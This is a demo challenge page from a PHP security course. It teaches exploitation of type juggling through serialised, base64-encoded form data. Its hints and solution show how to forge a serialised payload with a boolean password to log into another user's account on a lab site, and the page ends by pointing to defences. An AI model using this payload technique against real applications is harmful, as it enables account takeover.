Attack! Type Juggling

Challenge #4: What About Serialization?

This is a demo module, sign up for the course here!

It's not just JSON which lets us exploit Type Juggling vulnerabilities by controlling data types. Any serialisation format that supports defining types, and can be properly parsed by PHP (or any other language), can be used to exploit Type Juggling vulnerabilities.

As long as we can control the data types, we can manipulate the input to trigger the vulnerability.

Your Challenge

As the final challenge in this module, I'm leaving you to figure out all the details yourself...

As always, if you don't know where to start, check out the hints...

Objectives

  1. Identify the vulnerable input and manipulate the payload to gain access to Pippin's account.
Hint #1

Unlike previous challenges, you're not looking for a query parameter or JSON payload...

Hint #2

The button should indicate the potential for a Form, which means there could be hidden fields...

Hint #3

When you view the source of the page, you should see something that looks like this: 

<form method="POST">
    <input type="hidden" name="_token" value="...">
    <input type="hidden" name="payload" id="payload" value="YToyOntzOjg6InVzZXJuYW1lIjtzOjU6Im1lcnJ5IjtzOjg6InBhc3N3b3JkIjtzOjEwOiJicmFuZHlidWNrIjt9">
    <p><button type="submit">Please click to continue...</button></p>
</form>

The only interesting thing here is that payload hidden field, with that suspiciously familiar-looking string...

Hint #4

Hopefully you've figured out that the payload in the hidden field is a Base 64 string. We can decode it to get this: 

> base64_decode('YToyOntzOjg6InVzZXJuYW1lIjtzOjU6Im1lcnJ5IjtzOjg6InBhc3N3b3JkIjtzOjEwOiJicmFuZHlidWNrIjt9');
= "a:2:{s:8:"username";s:5:"merry";s:8:"password";s:10:"brandybuck";}"

Which, if you're not familiar with PHP serialisation, is a PHP array with two key-value pairs, serialised using the serialize() function. It's a common way to store data in PHP, because it can store complex data structures and specifically data types too. The s:5 and s:10 signify string values of specific lengths (5 and 10 characters respectively), while the leading a:2: signifies an array with 2 elements, and b would be used for boolean values.

This data structure should be familiar if you've completed Challenge #3, you just need to join the dots now.

Solution

Using the same Boolean type-juggling trick from Challenge #3, we can build our own custom payload to gain access to Pippin's account. 

> $payload = ['username' => 'pippin', 'password' => true];
> $serialised = serialize($payload);
= "a:2:{s:8:"username";s:6:"pippin";s:8:"password";b:1;}"
> base64_encode($serialised);
= "YToyOntzOjg6InVzZXJuYW1lIjtzOjY6InBpcHBpbiI7czo4OiJwYXNzd29yZCI7YjoxO30="

This payload can then be injected into the hidden field - replacing the existing payload - using the browser inspector, and then submitted to the server. If you've generated a working payload, you'll get a success message!

Status
Demo
Open in New Tab

If you've made it this far and completed all of the challenges, why not Tweet about it, or send a Toot on Mastodon? Let everyone know you're on your way to becoming a hacker and keeping your apps secure!

Don't forget to tag me on Twitter (@valorin) or Mastodon (@[email protected]) so I can see how you're going.

Now that you've solved the challenges, it's time to learn how to defend against these attacks and keep your apps secure!

Learn about Strict/Secure Comparisons!